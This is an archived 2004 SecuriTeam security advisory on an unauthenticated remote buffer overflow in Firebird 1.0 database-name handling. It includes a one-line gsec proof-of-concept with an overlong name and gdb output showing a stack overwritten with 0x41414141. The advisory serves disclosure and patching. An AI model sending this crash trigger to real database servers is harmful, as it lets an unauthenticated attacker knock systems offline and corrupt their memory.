[UNIX] Firebird Database Remote Database Name Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 05/23/04

  • Next message: SecuriTeam: "[NT] Mollensoft Lightweight FTP Server CWD Buffer Overflow" 
    To: list@securiteam.com
Date: 23 May 2004 14:57:13 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Firebird Database Remote Database Name Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://firebird.sourceforge.net/> Firebird is "a relational database
    offering many ANSI SQL-92 features that runs on Linux, Windows, and a
    variety of Unix platforms. Firebird offers excellent concurrency, high
    performance, and powerful language support for stored procedures and
    triggers. It has been used in production systems, under a variety of names
    since 1981".

    A vulnerability in Firebird Database's way of handling database names,
    allows an unauthenticated user to cause the server to crash, and overwrite
    critical section of the stack used by the database.

    DETAILS

    Vulnerable Systems:
     * Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

    Immune Systems:
     * Firebird Database version 1.5.0 (others are presumed to be immune as
    well)

    By issuing:
    gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever
    -password whatever

    On a remote server, you can see that:
    gdb /usr/lib/firebird/bin/ibserver
    GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is
    free software, covered by the GNU General Public
    License, and you are welcome to change it and/or distribute copies of it
    under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for
    details.
    This GDB was configured as "i386-linux"...(no debugging symbols
    found)...Using host libthread_db library
    "/lib/tls/libthread_db.so.1".

    (gdb) r
    Starting program: /usr/lib/firebird/bin/ibserver
    (no debugging symbols found)...(no debugging symbols
    found)...(no debugging symbols found)...(no debugging
    symbols found)...(no debugging symbols found)...[Thread
    debugging using libthread_db enabled]
    [New Thread 1075462272 (LWP 31389)]
    (no debugging symbols found)...(no debugging symbols
    found)...(no debugging symbols found)...(no debugging
    symbols found)...(no debugging symbols found)...[New
    Thread 1092549552 (LWP 31392)]
    [New Thread 1100938160 (LWP 31393)]
    [Thread 1100938160 (LWP 31393) exited]
    [Thread 1092549552 (LWP 31392) exited]
    [New Thread 1092549552 (LWP 31396)]

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 1092549552 (LWP 31396)]
    0x08132223 in ERR_post ()

    (gdb) bt
    #0 0x08132223 in ERR_post ()
    #1 0x080942ac in THD_wlck_unlock ()
    #2 0x41414141 in ?? ()
    #3 0x41414141 in ?? ()
    #4 0x41414141 in ?? ()
    #5 0x41414141 in ?? ()
    #6 0x41414141 in ?? ()
    #7 0x41414141 in ?? ()
    #8 0x00414141 in ?? ()
    #9 0x0000012c in ?? ()
    ..

    Solution:
    Debian is currently not maintaining this version of the product, so it is
    recommended that you use a source code based installation.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:expert@securiteam.com> Noam
    Rathaus.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Mollensoft Lightweight FTP Server CWD Buffer Overflow"

    Relevant Pages

    • Firebird Database Remote Database Name Overflow
      ... Firebird Database Remote Database Name Overflow ... GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, ... This GDB was configured as "i386-linux"...(no debugging symbols ...
      (Bugtraq)
    • [VulnWatch] Firebird Database Remote Database Name Overflow
      ... Firebird Database Remote Database Name Overflow ... GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, ... This GDB was configured as "i386-linux"...(no debugging symbols ...
      (VulnWatch)
    • [Full-Disclosure] Firebird Database Remote Database Name Overflow
      ... Firebird Database Remote Database Name Overflow ... GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, ... This GDB was configured as "i386-linux"...(no debugging symbols ...
      (Full-Disclosure)
    • [UNIX] htget Remotely Exploitable Buffer Overflow (ReadLine)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GNU gdb 6.3-debian ... There is absolutely no warranty for GDB. ... This GDB was configured as "i386-linux"...(no debugging symbols found) ...
      (Securiteam)
    • [UNIX] HP Tru64 libpthread Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... HP Tru64 libpthread Buffer Overflow ... # Run newaliases in gdb with the -q flag. ... (no debugging symbols found)... ...
      (Securiteam)